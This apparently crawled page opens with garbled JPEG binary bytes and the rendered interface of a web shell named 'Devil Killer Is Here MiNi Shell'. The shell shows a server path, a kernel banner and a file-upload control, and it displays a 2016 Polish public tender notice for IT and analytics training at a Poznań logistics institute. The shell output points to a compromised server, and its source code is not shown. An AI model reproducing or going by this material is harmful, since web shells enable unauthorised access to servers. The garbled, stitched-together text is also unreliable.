JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/162879-N-2016.html

<p class="kh_header"><b>Poznań: PRZ 000018 2016 Szkolenia analityczne oraz informatyczne dla zespołu projektu ePk</b><br>
<b>Numer ogłoszenia: 162879 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Logistyki i Magazynowania , ul. E. Estkowskiego 6, 61-755 Poznań, woj. wielkopolskie, tel. 061 8504890, faks 061 8526376.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ilim.poznan.pl/zamowienia-publiczne/zamowienia-w-trybie-pzp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZ 000018 2016 Szkolenia analityczne oraz informatyczne dla zespołu projektu ePk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa przeprowadzenia szkoleń analitycznych oraz informatycznych dla zespołu projektu ePk Instytutu Logistyki i Magazynowania.
Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w wysokości 
50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt 6 Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje lub będzie dysponował osobą prowadzącą szkolenie posiadającą kwalifikacje zawodowe i doświadczenie niezbędne do wykonania zamówienia tj.: co najmniej jedną osobą, która spełnia jednocześnie wszystkie poniższe wymagania (dla danej części): 

W zakresie Części 1: Plain Language: 
W ostatnich 2 latach przeprowadziła co najmniej 10 szkoleń lub warsztatów w zakresie upraszczania komunikacji językowej w administracji publicznej (dla języka polskiego).
W ostatnich 2 latach brała udział w opracowaniu lub upraszczaniu treści przynajmniej 50 formularzy, wzorów dokumentów urzędowych, opisów procedur lub innej dokumentacji wykorzystywanej w administracji publicznej (w języku polskim).
W ostatnich 2 latach brała udział w przygotowaniu przynajmniej jednego kursu e-learningowego z wykorzystaniem zasad plain language (w języku polskim), lub szkoliła w tym zakresie.

W zakresie Części 2: REQB FL:
W ostatnich 2 latach przeprowadził co najmniej 10 szkoleń lub warsztatów przygotowujących do egzaminu Certified Professional for Requirements Engineering - Foundation Level.
Zdała egzamin Certified Professional for Requirements Engineering - Foundation Level.
W ostatnich 2 latach brała udział w co najmniej 4 projektach zadaniach zleceniach w których analizowała i określała wymagania dla systemów informatycznych. 

W zakresie Części 3: IBUQ FL:
W ostatnich 2 latach przeprowadziła co najmniej 10 szkoleń lub warsztatów przygotowujących do certyfikatu IBUQ Foundation Level,
Posiada certyfikat IBUQ Foundation Level.
W ostatnich 2 latach brała udział w co najmniej 2 projektach zadaniach zleceniach w  których uczestniczyła w projektowaniu interfejsów użytkownika dla systemów informatycznych użytkowanych na urządzeniach stacjonarnych.
W ostatnich 2 latach brała udział w co najmniej 2 projektach zadaniach zleceniach w których uczestniczyła w projektowaniu interfejsów użytkownika dla systemów informatycznych użytkowanych na urządzeniach mobilnych.

W zakresie Części 4: User Experience:
W ostatnich 2 latach przeprowadziła co najmniej 10 szkoleń lub warsztatów zgodnych z tematyką projektowania zorientowanego na użytkownika.
W ostatnich 2 latach brała udział w co najmniej 4 projektach zadaniach zleceniach w  których projektowała, weryfikowała lub audytowała użyteczność interfejsów użytkownika. 

W zakresie Części 5: Google Analytics:
Posiada certyfikat trenera Google AdWords.
Posiada certyfikat trenera Google Google Analytics.
W ostatnich 2 latach przeprowadziła co najmniej 10 szkoleń lub warsztatów z zakresu Google AdWords, Google Analytics.
W ostatnich 2 latach brała udział w co najmniej 4 projektach zadaniach zleceniach w  których praktycznie wykorzystywała narzędzia Google AdWords i Google Analytics.

W zakresie Części 6:  Angular JS:
Posiada praktyczną wiedzę i doświadczenie popartą co najmniej 2 publikacjami branżowymi lub wystąpieniami na konferencjach IT z tematyki programowania z wykorzystaniem Angular JS. 
W ostatnich 2 latach przeprowadziła co najmniej 5 szkoleń lub warsztatów z tematyki Angular JS.
W ostatnich 2 latach brała udział w co najmniej 1 projekcie zadaniu zleceniu, w którym praktycznie wykorzystywała Angular JS.

W zakresie Części 7: OpenShift:
Posiada status instruktora Red Hat - w ofercie należy podać jego numer w celu sprawdzenia pod adresem https: www.redhat.com rhtapps certification verify.
Posiada certyfikat Red Hat Certified Engineer.
Posiada certyfikat Red Hat Cloud Infrastructure.
Posiada zaliczony egzamin EX280 Red Hat Certificate of Expertise in Platform-as-a-Service.
W ostatnich 2 latach przeprowadziła co najmniej  5 szkoleń lub warsztatów z zakresu Open Shift.
W ostatnich 2 latach brała udział w co najmniej 1 projekcie zadaniu zleceniu, w  którym praktycznie wykorzystywała OpenShift.

W zakresie Części 8: WildFly:
Posiada praktyczną wiedzę i doświadczenie popartą co najmniej 2 publikacjami branżowymi lub wystąpieniami na konferencjach IT z tematyki WildFly.
W ostatnich 2 latach przeprowadziła co najmniej 5 szkoleń lub warsztatów z tematyki WildFly.
W ostatnich 2 latach brała udział w co najmniej 1 projekcie zadaniu zleceniu, w  którym praktycznie wykorzystywała WildFly.

W zakresie Części 9: Testowanie auto:
Posiada praktyczną wiedzę i doświadczenie popartą co najmniej 2 publikacjami branżowymi lub wystąpieniami na konferencjach IT z tematyki całościowego podejścia do testowania automatycznego dla programistów. 
W ostatnich 2 latach przeprowadziła co najmniej 5 szkoleń lub warsztatów z tematyki Całościowe podejście do testowania automatycznego dla programistów.
W ostatnich 2 latach brała udział w co najmniej 1 projekcie zadaniu zleceniu, w  którym praktycznie wykorzystywała testy automatyczne.

W zakresie Części 10: Skalowanie Agile:
Posiada certyfikat Professional Scrum Trainer Scrum.org,
W ostatnich 2 latach przeprowadziła co najmniej 5 szkoleń lub warsztatów z zakresu Scrum, Scalowanie Scrum.
W ostatnich 2 latach brała udział w co najmniej 1 projekcie zadaniu zleceniu w którym praktycznie wykorzystywał skalowanie Scrum.

W przypadku, gdy Wykonawca złoży ofertę w zakresie więcej niż jednej części, Wykonawca może wskazać w tych częściach jedną i tą samą osobę - pod warunkiem, że  łącznie będzie ona spełniała wszystkie wymagania określone dla poszczególnych części zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jw</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli zamówienie realizowane będzie wspólnie przez Wykonawców, każdy z  wykonawców występujących wspólnie powinien złożyć dokumenty potwierdzające, że nie podlega wykluczeniu, tzn. każdy z wykonawców musi złożyć oświadczenia oraz dokumenty, o których mowa w ust. 1c) do 1 g) Rozdziału 8 SIWZ. Wspólnie zostaną złożone pozostałe dokumenty. Wspólników spółki cywilnej traktuje się jako wykonawców ubiegających się wspólnie o udzielenie zamówienia. 
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia Wykonawca w  takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Wykonawcy, którzy wspólnie ubiegać się będą o udzielenie zamówienia publicznego ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Stosowne pełnomocnictwo należy dołączyć do oferty. 
Jeżeli oferta wykonawców ubiegających się wspólnie o udzielenie zamówienia zostanie wybrana, Zamawiający będzie wymagał złożenia przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach:
a)	konieczność wprowadzenia zmian wynika ze zmiany stanu prawnego w zakresie dotyczącym realizowanej umowy, mającego wpływ na zobowiązania Stron, w szczególności:
1) stawki podatku od towarów i usług, 
2) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, 
3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. 
	- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.
b)	gdy niedotrzymanie pierwotnego terminu realizacji umowy  stanowi konsekwencję nienależytego wykonywania zobowiązań leżących po stronie Zamawiającego,
c)	gdy niedotrzymanie pierwotnego terminu realizacji umowy  stanowi konsekwencję okoliczności zależnych od zobowiązań Zamawiającego wobec osób trzecich,
d) gdy niedotrzymanie pierwotnego terminu realizacji umowy, stanowi konsekwencję działania sił wyższych niezależnych od Wykonawcy, nie stanowiących jego i podwykonawców problemów organizacyjnych, których nie można było przewidzieć, poza zdarzeniami zwykłymi - Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy o czas niezbędny do usunięcia konsekwencji działania siły wyższej. Siła wyższa, o której mowa jest to zdarzenie niezależne od Wykonawcy, nie stanowiące jego problemów organizacyjnych, którego strony umowy nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogły przeciwdziałać, a które uniemożliwiają Wykonawcy wykonanie w części lub w całości jego zobowiązania wynikającego z niniejszej umowy. Siła wyższa obejmuje w szczególności zdarzenia żywiołowe, jak bardzo niskie temperatury powietrza lub ciągłe ulewne deszcze uniemożliwiające zachowanie wymogów technologicznych;
2.Zamawiający dopuszcza możliwość zmian postanowień niniejszej Umowy w innych, niż określone powyżej sytuacjach, których nie można było przewidzieć w chwili zawarcia Umowy i mających charakter zmian nieistotnych, tj. nie odnoszących się do kwestii, które podlegały ocenie podczas wyboru Wykonawcy, a także takich, których wprowadzenie na etapie postępowania nie miałoby wpływu na zmianę kręgu podmiotów, które ubiegają się o to zamówienie lub doprowadziłoby do wyboru innej oferty niż pierwotnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ilim.poznan.pl/zamowienia-publiczne/zamowienia-w-trybie-pzp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Logistyki i Magazynowania
ul. Estkowskiego 6
61-755 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 10:00, miejsce: Instytut Logistyki i Magazynowania
ul. Estkowskiego 6
61-755 Poznań
Kancelaria wejście A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Rozwój Pojedynczego Punktu Kontaktowego trzeciej generacji współfinansowany z Programu Polska Cyfrowa ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Plain Language.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa szkolenia: Wprowadzenie do plain language
II.	Cel: Nabycie umiejętności przygotowywania komunikatywnych treści - głównie opisów procedur administracyjnych przeznaczonych dla obywateli i przedsiębiorców, umieszczanych na portalu Pojedynczego Punktu Kontaktowego biznes.gov.pl
III.	Forma szkolenia: wykłady max 50% i warsztaty min 50 % czasu trwania szkolenia.
IV.	Czas trwania : min. 8 godzin zegarowych w tym przerwy około 1 godziny.
V.	Miejsce szkolenia : siedziba zamawiającego (Poznań, ul. Estkowskiego 6), zamawiający zapewni uczestnikom salę, komputery i sprzęt audiowizualny wg potrzeb. 
VI.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-09-30. 
VII.	Ilość osób: 15
VIII.	Program szkolenia:
1. Wstęp do plain language w tym między innymi:
zakres wykorzystania, 
typy tekstów, cechy charakterystyczne tekstów, 
różnicowanie podejścia, 
przedstawienie generalnych zasad tworzenia opisów. 
Zapoznanie uczestników z zagadnieniami, którymi zajmuje się plain-language. 
2. Omówienie kilku typów tekstów, w tym należy szczegółowo omówić
a)	Na bazie dostarczonych przez zamawiającego około 20 opisów procedur administracyjnych omówienie najczęściej popełnianych błędów oraz propozycji zmian 
i  zaleceń. 
b)	Pismo kierowane do urzędu o charakterze propozycji współpracy (relacja partner-partner), a nie wniosku o załatwienie sprawy (relacja klient- urząd). 
c)	Tekst informacyjny - np. tekst fragmentu strony www, artykuł.  

Wskazane punkty należy omówić z przykładami oraz przeprowadzić ćwiczenia poprawy lub tworzenia tekstów, zaproponować i omówić proponowane szablony opisów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Dodatkowy pakiet konsultacji telefonicznych - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> REQB FL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do SIWZ - Opisie przedmiotu zamówienia.
I.	Nazwa szkolenia: Przygotowanie do egzaminu Certified Professional for Requirements Engineering - Foundation Level, wraz z egzaminem.
II.	Cel: Przygotowanie uczestników do zdania egzaminu Certified Professional for Requirements Engineering - Foundation Level
III.	Forma szkolenia: wykład, ćwiczenia.
IV.	Czas trwania : min. 14 godzin zegarowych
V.	Miejsce szkolenia : sala zapewniona przez firmę szkolącą na terenie miasta Poznania. 
VI.	Termin szkolenia: do ustalenia po wyborze firmy szkolącej; nie później niż do 2016-10-31. 
VII.	Ilość osób: 2
VIII.	Uwaga: w cenie szkolenia wliczona zostaje opłata egzaminacyjna. 
IX.	Program szkolenia - między innymi:
1.	Wprowadzenie do inżynierii wymagań,
2.	Środowisko inżynierii wymagań,
3.	Standardy stosowane w inżynierii wymagań, 
4.	Zarządzanie wymaganiami ,
5.	Rozwój wymagań,
6.	Zapoznanie/porównanie z innymi modelami procesów 
7.	Wykorzystywane/proponowane narzędzia wspomagania pracy, 
8.	Przygotowanie do egzaminu Certified Professional for Requirements Engineering Foundation Level - omówienie zasad prowadzenia egzaminu, przeprowadzenie egzaminu próbnego,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.51.00.00-2.</p></li>
